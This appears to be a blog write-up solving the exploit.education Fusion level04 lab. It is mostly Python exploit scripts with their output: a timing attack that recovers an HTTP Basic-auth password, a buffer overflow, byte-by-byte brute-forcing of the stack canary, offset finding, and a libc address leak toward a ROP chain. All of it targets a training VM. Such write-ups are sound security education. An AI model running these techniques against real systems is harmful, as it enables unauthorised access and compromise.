\nhttp:\/\/exploit.education\/fusion\/level04\/<\/a><\/p>\n
The difficulty has really been bumped up a few notches with this level. There are multiple protections to circumvent so you just have to take them one at a time.<\/p>\n
Source Code Analysis<\/h1>\n
Like the last level, I won’t go into great detail with all the source code since most of it doesn’t matter. I haven’t even analyzed it all myself.<\/p>\n
Starting with the comments, we can see that this is an HTTP server based on an open source implementation called micro_httpd. So the first thing I did was open a browser and tried to connect to the Fusion VM over port 20004:<\/p>\n
![\"\"](\"https:\/\/blog.lamarranet.com\/wp-content\/uploads\/2020\/03\/auth.jpg\")
<\/p>\n
As you can see, some basic authentication is required. If you just click cancel on the dialog, you’ll get a “401 Unauthorized” message. Next, I’ll look for vulnerabilities to see if I can bypass that authentication.<\/p>\n
I spotted a buffer overflow in the Note: I’m only showing the relevant lines.<\/p>\n That The problem is, if the password is wrong, the code jumps to the First, I’ll write a short Python script to make sure I know how to interact with the program:<\/p>\n Not surprisingly, I get a 401 error when running that:<\/p>\n Before getting into the details of brute-forcing this password, it’s important to note that 2,500 microseconds for an incorrect character is not<\/i> a lot of time. It can be hard, if not impossible, to measure that delay over a network, especially when there’s so many other factors at play. I had a tough enough time writing a brute-force script that reliably worked across 2 virtual machines. I, eventually, came up with 2 different attempts, the second one working more reliably, though it takes longer. However, it seems both of these attempts worked perfectly when the binary was being run locally (but that’s cheating, now, isn’t it).<\/p>\n For my first attempt, I would guess at the password, going through all of the possibilities for each character. For each possibility, I sent an attempt to the server, timed the response, repeated X number of times (usually 100), took the average and moved to the next character. When the difference between the average time for the current character and the previous character were more than 2500 microseconds, it would mark that one (the shorter one) as the correct character and move on. The problem with this attempt is that it would sometimes get false positives on which character was the correct one before getting to the actual correct character. Network latency, even between two VMs on the same host seemed to be a bit unreliable.<\/p>\n My second attempt was a bit more reliable. It will go through each possible character, guessing X number of times for each, find the average, and keep track of the character with the lowest average. Here’s the code for that and an example run:<\/p>\n FYI: The Now I’m going to test it out in the web browser:<\/p>\n Now that I can get past that pesky authentication, I’ll need to be able to defeat the stack canary. In case you’re not familiar, a stack canary is a (mostly) random value placed on the stack that’s checked before a function returns. If it’s been modified, then the program exits with an error code and that function does not return. How can we overwrite the saved return address on the stack and start ROPing? We’ll need to overwrite the canary with the exact same value that it currently has. How can we get that value? We’ll take an advantage of the fact that the canary value is the same every time the process forks and brute force it.<\/p>\n First, let’s take the same code I used before in Like I said earlier, the password needs to be correct or the function never returns and the buffer overflow will do nothing. However, the program only checks the first 16 characters. It doesn’t care what’s in the password field after that. I could include a username but that’ll just add unnecessary complexity to the script. Now when I run it:<\/p>\n Ok, so maybe you’re wondering, how can brute force this canary? Well, first we find the location of the canary on the stack. I wrote a short script to do this. It just keeps adding bytes to the buffer until the program returns that “stack smashing detected” error:<\/p>\n I set “context.log_level” to “logging.ERROR” so that I wouldn’t get all of the output that pwntools normally generates. By default, it’s set to “logging.INFO”. It takes less than a second to complete:<\/p>\n Next, we overwrite it, one byte at a time. At each byte, we keep guessing the value until we no longer get the “stack smashing detected” error:<\/p>\n Now I need to figure out how far after the canary the saved return address is:<\/p>\n Now on the Fusion VM, I can check what the value of the EIP register was:<\/p>\n Calculating the offset:<\/p>\n So the saved return address is 28 bytes after the end of the canary.<\/p>\n This part is a little more difficult than with past levels as this binary is a “position independent executable” meaning the entire body of code can function properly no matter where, in memory, it’s placed. This means that the Honestly, I got lucky here while playing around with this. I had inadvertently obtained a backtrace and memory map. The conditions for this seem to be having an incorrect value for the canary and the saved return address must be overwritten with a value somewhere between 0xb75d2000 and 0xbfa5dffc. I’m still not sure why this happens so feel free to leave a comment if you know.<\/p>\n Here’s an example that worked for me:<\/p>\n Running this gets us all the information we need to build a ROP chain:<\/p>\n I’ve highlighted one of the lines in the backtrace. We can see that the validate_credentials()<\/code> function:<\/p>\n\r\nint validate_credentials(char *line) {\r\n char *p, *pw;\r\n unsigned char details[2048];\r\n int bytes_wrong;\r\n int l;\r\n struct timeval tv;\r\n int output_len;\r\n\r\n memset(details, 0, sizeof(details));\r\n\r\n output_len = sizeof(details);\r\n\r\n ...\r\n\r\n base64_decode(line, strlen(line), details, &output_len);\r\n ...\r\n for(bytes_wrong = 0, l = 0; pw[l] && l < password_size; l++) {\r\n if(pw[l] != password[l]) {\r\n ...\r\n bytes_wrong++;\r\n }\r\n }\r\n\r\n \/\/ anti bruteforce mechanism. good luck ;>\r\n tv.tv_sec = 0;\r\n tv.tv_usec = 2500 * bytes_wrong;\r\n\r\n select(0, NULL, NULL, NULL, &tv);\r\n\r\n if (l < password_size || bytes_wrong)\r\n send_error(401, "Unauthorized", "WWW-Authenticate: Basic realm=\\"stack06\\"", "Unauthorized");\r\n\r\n return 1;\r\n}\r\n<\/pre>\nbase64_decode()<\/code> function simply decodes whatever base64 is given in the “line” variable and saves it to the “details” variable. We can supply a base64 string of any length and it will happily overflow that 2048 byte buffer.<\/p>\nsend_error()<\/code> function and exits instead of returning from validate_credentials()<\/code>. You might also notice that the program uses the select()<\/code> function to pause execution for 2,500 microseconds for every wrong character in the password. This is supposed to be an anti brute-force mechanism, but ironically, it’s what allows us to brute-force it. We can guess at the password, 1 character at a time, trying all possibilities. The one that takes the least amount of time should be the correct character. The code only adds to the “bytes_wrong” integer if the client supplies an incorrect character. The amount of time the program pauses for is based on that variable.<\/p>\nFinding The Password<\/h1>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom base64 import b64encode\r\nfrom pwn import *\r\n\r\npassword = b"ABCD"\r\n\r\npayload = b"GET \/ HTTP\/1.1\\n"\r\npayload += b"Authorization: Basic "\r\npayload += b64encode(password)\r\npayload += b"\\n\\n"\r\n\r\nio = remote("fusion", 20004)\r\nio.send(payload)\r\nprint(io.recvall().decode())\r\n<\/pre>\n\r\nandrew ~\/fusion\/level04 $ .\/level04_test.py \r\n[+] Opening connection to fusion on port 20004: Done\r\n[+] Receiving all data: Done (27B)\r\n[*] Closed connection to fusion port 20004\r\nHTTP\/1.0 401 Unauthorized\r\n<\/pre>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom base64 import b64encode\r\nimport socket\r\nimport string\r\nimport time\r\n\r\n\r\ntarget = "fusion"\r\ntimes = 50\r\n\r\npossibilities = (string.ascii_letters + string.digits).encode()\r\nheader = b"GET \/ HTTP\/1.1\\nAuthorization: Basic "\r\npassword = b""\r\n\r\nfor _ in range(16):\r\n test = password\r\n lowest = (0, 1000000000)\r\n for i, c in enumerate(possibilities):\r\n test += bytes([c])\r\n payload = header + b64encode(test) + b"\\n\\n"\r\n total = 0\r\n for _ in range(times):\r\n s = socket.socket()\r\n s.connect((target, 20004))\r\n s.send(payload)\r\n start = time.time_ns()\r\n s.recv(1024)\r\n total += (time.time_ns() - start)\r\n s.close()\r\n curr_avg = total \/\/ times\r\n\r\n if lowest[1] - curr_avg > 0:\r\n lowest = (test, curr_avg)\r\n\r\n test = password\r\n password = lowest[0]\r\n print(f"Password so far: {password.decode()}")\r\n<\/pre>\ntime.time_ns()<\/code> function is new with Python 3.7 and returns an integer number of nanoseconds since the epoch.<\/p>\n\r\nandrew ~\/fusion\/level04 $ time .\/level04_brute.py\r\nPassword so far: Y\r\nPassword so far: Y5\r\nPassword so far: Y51\r\nPassword so far: Y516\r\nPassword so far: Y516b\r\nPassword so far: Y516bu\r\nPassword so far: Y516bu8\r\nPassword so far: Y516bu8E\r\nPassword so far: Y516bu8El\r\nPassword so far: Y516bu8Els\r\nPassword so far: Y516bu8Elsx\r\nPassword so far: Y516bu8ElsxR\r\nPassword so far: Y516bu8ElsxRq\r\nPassword so far: Y516bu8ElsxRqg\r\nPassword so far: Y516bu8ElsxRqg1\r\nPassword so far: Y516bu8ElsxRqg1k\r\n\r\nreal 3m46.094s\r\nuser 0m1.391s\r\nsys 0m18.615s\r\n<\/pre>\n
![\"\"](\"https:\/\/blog.lamarranet.com\/wp-content\/uploads\/2020\/03\/auth_success.png\")
<\/p>\nFinding the Canary<\/h1>\n
level04_test.py<\/code> and try to do a simple buffer overflow with the wrong password. I’ll replace the “password” in line 6 to be<\/p>\n\r\npassword = b"2j4kIF8SD7dW075G"\r\npassword += b"A" * 3000\r\n<\/pre>\n
\r\nandrew ~\/fusion\/level04 $ .\/level04_bof.py \r\n[+] Opening connection to fusion on port 20004: Done\r\n[+] Receiving all data: Done (68B)\r\n[*] Closed connection to fusion port 20004\r\n*** stack smashing detected ***: \/opt\/fusion\/bin\/level04 terminated\r\n<\/pre>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom base64 import b64encode\r\nfrom pwn import *\r\n\r\n\r\nheader = b"GET \/ HTTP\/1.1\\nAuthorization: Basic "\r\npassword = b"2j4kIF8SD7dW075G"\r\npassword += b"A" * (2048 - len(password))\r\n\r\ncontext.log_level = logging.ERROR\r\nresp = ""\r\nwhile ("stack smashing detected" not in resp):\r\n password += b"A"\r\n payload = header\r\n payload += b64encode(password)\r\n payload += b"\\n\\n"\r\n\r\n io = remote("fusion", 20004)\r\n io.send(payload)\r\n resp = io.recvall().decode()\r\n\r\nprint(f"Canary found at {len(buff) - 1} bytes after the password")\r\n<\/pre>\n\r\nandrew ~\/fusion\/level04 $ .\/level04_findcanary.py \r\nCanary found at 2032 bytes after the password\r\n<\/pre>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom base64 import b64encode\r\nfrom pwn import *\r\n\r\n\r\ntarget = "fusion"\r\n\r\nheader = b"GET \/ HTTP\/1.1\\nAuthorization: Basic "\r\npassword = b"2j4kIF8SD7dW075G"\r\npassword += b"A" * 2032 # Number of bytes between the password and canary\r\n\r\n# The first bytes in a Linux canary is always null, but we'll check anyway\r\naddr = []\r\ncanary = b""\r\ncontext.log_level = logging.ERROR\r\nfor i in range(4):\r\n addr.append(0)\r\n for b in range(0x100):\r\n addr[i] = p8(b)\r\n canary = b"".join([addr[l] for l in range(len(addr))])\r\n\r\n payload = header\r\n payload += b64encode(password + canary)\r\n payload += b"\\n\\n"\r\n\r\n io = remote(target, 20004)\r\n io.send(payload)\r\n recvd = io.recv(32).decode()\r\n io.close()\r\n\r\n if "stack smashing detected" not in recvd:\r\n print(f"Byte position {i} found: {hex(b)}")\r\n break\r\n\r\nprint(f"Canary is {hex(u32(canary))}")\r\n<\/pre>\n\r\nandrew ~\/fusion\/level04 $ .\/level04_canary.py \r\nByte position 0 found: 0x0\r\nByte position 1 found: 0xa3\r\nByte position 2 found: 0x66\r\nByte position 3 found: 0xd5\r\nCanary is 0xd566a300\r\n<\/pre>\n
Finding the Offset<\/h1>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom base64 import b64encode\r\nfrom pwn import *\r\n\r\n\r\ncanary = p32(0xd566a300)\r\npassword = b"2j4kIF8SD7dW075G"\r\npassword += b"A" * 2032\r\npassword += canary\r\npassword += cyclic(100)\r\n\r\npayload = b"GET \/ HTTP\/1.1\\n"\r\npayload += b"Authorization: Basic "\r\npayload += b64encode(password)\r\npayload += b"\\n\\n"\r\n\r\nio = remote("fusion", 20004)\r\nio.send(payload)\r\nprint(io.recvall().decode())\r\n<\/pre>\n\r\nandrew ~\/fusion\/level04 $ .\/level04_offset.py \r\n[+] Opening connection to fusion on port 20004: Done\r\n[+] Receiving all data: Done (0B)\r\n[*] Closed connection to fusion port 20004\r\n<\/pre>\n
\r\nroot@fusion:~# dmesg | tail -n1\r\n[ 1328.555035] level04[1966]: segfault at 75616171 ip b76c4b19 sp bf952ffc error 4 in libgcc_s.so.1[b76af000+1c000]\r\n<\/pre>\n
\r\nandrew ~\/fusion\/level04 $ pwn cyclic -l $(echo -n 61616168 | xxd -r -p | rev)\r\n28\r\n<\/pre>\n
Creating a ROP Chain<\/h1>\n
.text<\/code> section (and a few others) we normally rely on to have consistent addresses are now impacted by ASLR.<\/p>\n\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom base64 import b64encode\r\nfrom pwn import *\r\n\r\n\r\noffset = 2080 # Bytes from "details" buffer to saved ret address\r\nbuff = 32 # Number of bytes from the canary to the saved return address\r\npassword = b"2j4kIF8SD7dW075G"\r\npassword += b"A" * (offset - buff - len(password))\r\npassword += b"B" * buff\r\npassword += p32(0xb7700000)\r\n\r\n\r\npayload = b"GET \/ HTTP\/1.1\\n"\r\npayload += b"Authorization: Basic "\r\npayload += b64encode(password)\r\npayload += b"\\n\\n"\r\n\r\nio = remote("fusion", 20004)\r\nio.send(payload)\r\nprint(io.recvall().decode())\r\n<\/pre>\n\r\nandrew ~\/fusion\/level04 $ .\/level04_mmap.py \r\n[+] Opening connection to fusion on port 20004: Done\r\n[+] Receiving all data: Done (1.52KB)\r\n[*] Closed connection to fusion port 20004\r\n*** stack smashing detected ***: \/opt\/fusion\/bin\/level04 terminated\r\n======= Backtrace: =========\r\n\/lib\/i386-linux-gnu\/libc.so.6(__fortify_fail+0x45)[0xb77b58d5]\r\n\/lib\/i386-linux-gnu\/libc.so.6(+0xe7887)[0xb77b5887]\r\n\/opt\/fusion\/bin\/level04(+0x2dd1)[0xb7879dd1]\r\n\/opt\/fusion\/bin\/level04(+0x22c7)[0xb78792c7]\r\n\/lib\/i386-linux-gnu\/libc.so.6(qsort+0x10)[0xb7700000]\r\n======= Memory map: ========\r\nb76af000-b76cb000 r-xp 00000000 07:00 92670 \/lib\/i386-linux-gnu\/libgcc_s.so.1\r\nb76cb000-b76cc000 r--p 0001b000 07:00 92670 \/lib\/i386-linux-gnu\/libgcc_s.so.1\r\nb76cc000-b76cd000 rw-p 0001c000 07:00 92670 \/lib\/i386-linux-gnu\/libgcc_s.so.1\r\nb76cd000-b76ce000 rw-p 00000000 00:00 0 \r\nb76ce000-b7844000 r-xp 00000000 07:00 92669 \/lib\/i386-linux-gnu\/libc-2.13.so\r\nb7844000-b7846000 r--p 00176000 07:00 92669 \/lib\/i386-linux-gnu\/libc-2.13.so\r\nb7846000-b7847000 rw-p 00178000 07:00 92669 \/lib\/i386-linux-gnu\/libc-2.13.so\r\nb7847000-b784a000 rw-p 00000000 00:00 0 \r\nb7854000-b7856000 rw-p 00000000 00:00 0 \r\nb7856000-b7857000 r-xp 00000000 00:00 0 [vdso]\r\nb7857000-b7875000 r-xp 00000000 07:00 92553 \/lib\/i386-linux-gnu\/ld-2.13.so\r\nb7875000-b7876000 r--p 0001d000 07:00 92553 \/lib\/i386-linux-gnu\/ld-2.13.so\r\nb7876000-b7877000 rw-p 0001e000 07:00 92553 \/lib\/i386-linux-gnu\/ld-2.13.so\r\nb7877000-b787b000 r-xp 00000000 07:00 75281 \/opt\/fusion\/bin\/level04\r\nb787b000-b787c000 rw-p 00004000 07:00 75281 \/opt\/fusion\/bin\/level04\r\nb7cc5000-b7ce6000 rw-p 00000000 00:00 0 [heap]\r\nbf948000-bf969000 rw-p 00000000 00:00 0 [stack]\r\n<\/pre>\n
__fortify_fail()<\/code> function is at 0xb77b58d5-0x45<\/code>, which turns out to be 0xb77b5890<\/code>. Now, I know that the memory map tells me that libc starts at 0xb76ce000<\/code>. However, in addition to getting libc’s base address, I need to know which version of libc this is. Yes, I already know since I figured this out on the last level, but for added realism, I’m not going to cheat and pretend I don’t already know.<\/p>\n